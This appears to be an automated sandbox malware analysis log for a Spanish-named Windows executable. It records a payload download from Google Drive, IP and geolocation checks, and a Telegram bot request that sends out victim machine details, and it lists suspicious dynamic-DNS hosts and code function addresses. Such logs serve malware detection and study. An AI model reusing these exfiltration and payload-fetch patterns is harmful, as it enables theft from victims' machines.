          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1sM3RZM_e1NtXuZxYYSjyfMLXmbX6dBhO HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1sM3RZM_e1NtXuZxYYSjyfMLXmbX6dBhO&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49986 version: TLS 1.0
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1sM3RZM_e1NtXuZxYYSjyfMLXmbX6dBhO HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1sM3RZM_e1NtXuZxYYSjyfMLXmbX6dBhO&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:302494%0D%0ADate%20and%20Time:%2011/11/2024%20/%2023:31:24%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20302494%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: drive.google.com
          Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 11 Nov 2024 14:28:25 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3400640723.0000000037071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3400640723.0000000037071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3400640723.0000000037071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3400640723.0000000037071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: CERTIFICADO TITULARIDAD.exe, 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmp, CERTIFICADO TITULARIDAD.exe, 00000000.00000000.2109728509.000000000040A000.00000008.00000001.01000000.00000003.sdmp, CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3373331622.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3400640723.0000000037071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3400640723.0000000037071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038376000.00000004.00000800.00020000.00000000.sdmp, CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038376000.00000004.00000800.00020000.00000000.sdmp, CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038376000.00000004.00000800.00020000.00000000.sdmp, CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038376000.00000004.00000800.00020000.00000000.sdmp, CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3400640723.00000000371F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3400640723.00000000371F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enH
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3379964437.0000000006AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3380476055.0000000008640000.00000004.00001000.00020000.00000000.sdmp, CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3379964437.0000000006AE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1sM3RZM_e1NtXuZxYYSjyfMLXmbX6dBhO
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3379964437.0000000006B00000.00000004.00000020.00020000.00000000.sdmp, CERTIFICADO TITULARIDAD.exe, 00000004.00000003.2803888534.0000000006B21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3379964437.0000000006B00000.00000004.00000020.00020000.00000000.sdmp, CERTIFICADO TITULARIDAD.exe, 00000004.00000003.2803888534.0000000006B21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/%
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3379964437.0000000006B00000.00000004.00000020.00020000.00000000.sdmp, CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3379964437.0000000006AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1sM3RZM_e1NtXuZxYYSjyfMLXmbX6dBhO&export=download
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038376000.00000004.00000800.00020000.00000000.sdmp, CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038376000.00000004.00000800.00020000.00000000.sdmp, CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038376000.00000004.00000800.00020000.00000000.sdmp, CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3400640723.000000003712A000.00000004.00000800.00020000.00000000.sdmp, CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3400640723.00000000370BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3400640723.00000000370BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3400640723.00000000370BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/66.23.206.109
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3400640723.000000003712A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/66.23.206.109$
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038376000.00000004.00000800.00020000.00000000.sdmp, CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038376000.00000004.00000800.00020000.00000000.sdmp, CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3400640723.0000000037224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3400640723.0000000037224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/H
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3400640723.000000003722E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
          Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
          Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
          Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
          Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
          Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.6:49983 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.217.18.1:443 -> 192.168.2.6:49984 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:50003 version: TLS 1.2
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 0_2_004056E5 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056E5
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034FC
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004034FC
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 0_2_00406C3F0_2_00406C3F
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 0_2_73F71BFF0_2_73F71BFF
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_00406C3F4_2_00406C3F
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_000DC1474_2_000DC147
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_000DD2784_2_000DD278
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_000D53624_2_000D5362
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_000DC7384_2_000DC738
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_000DE9884_2_000DE988
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_000D69A04_2_000D69A0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_000DCA084_2_000DCA08
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_000DCCD84_2_000DCCD8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_000D9DE04_2_000D9DE0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_000DCFA94_2_000DCFA9
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_000D6FC84_2_000D6FC8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_000DF9614_2_000DF961
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_000DE97B4_2_000DE97B
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_000D29E04_2_000D29E0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_000D3E094_2_000D3E09
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A229684_2_39A22968
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A295484_2_39A29548
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A250284_2_39A25028
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A2FC684_2_39A2FC68
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A217A04_2_39A217A0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A21E804_2_39A21E80
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A2D9A84_2_39A2D9A8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A2D9994_2_39A2D999
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A2DDF14_2_39A2DDF1
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A2DDFF4_2_39A2DDFF
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A2D5404_2_39A2D540
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A2D5504_2_39A2D550
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A2CCA04_2_39A2CCA0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A2CC8F4_2_39A2CC8F
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A2D0E94_2_39A2D0E9
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A2D0F84_2_39A2D0F8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A2F8024_2_39A2F802
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A200124_2_39A20012
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A2F8104_2_39A2F810
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A29C184_2_39A29C18
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A250184_2_39A25018
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A200404_2_39A20040
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A28BA04_2_39A28BA0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A2F3B84_2_39A2F3B8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A2178F4_2_39A2178F
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A20B204_2_39A20B20
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A20B304_2_39A20B30
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A2EB084_2_39A2EB08
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A2EF604_2_39A2EF60
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A2EF514_2_39A2EF51
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A2E6A04_2_39A2E6A0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A2E6AF4_2_39A2E6AF
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A2E6B04_2_39A2E6B0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A2EAF84_2_39A2EAF8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A2DE004_2_39A2DE00
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A21E704_2_39A21E70
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A2E24A4_2_39A2E24A
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_39A2E2584_2_39A2E258
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A3A7B784_2_3A3A7B78
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A3A27584_2_3A3A2758
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A3A8FB04_2_3A3A8FB0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A3A15F84_2_3A3A15F8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A3A81D04_2_3A3A81D0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A3A46204_2_3A3A4620
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A3A6A184_2_3A3A6A18
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A3A46104_2_3A3A4610
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A3ACE784_2_3A3ACE78
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A3A4A784_2_3A3A4A78
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A3A6E704_2_3A3A6E70
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A3A4A684_2_3A3A4A68
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A3AEE684_2_3A3AEE68
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A3A6E624_2_3A3A6E62
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A3ACE674_2_3A3ACE67
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A3A1A504_2_3A3A1A50
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A3AEE574_2_3A3AEE57
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A3A1A414_2_3A3A1A41
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A3A72B84_2_3A3A72B8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A3A1EA84_2_3A3A1EA8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A3A1E984_2_3A3A1E98
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A3AF2F84_2_3A3AF2F8
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A3A22F04_2_3A3A22F0
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_3A3AD2F74_2_3A3AD2F7
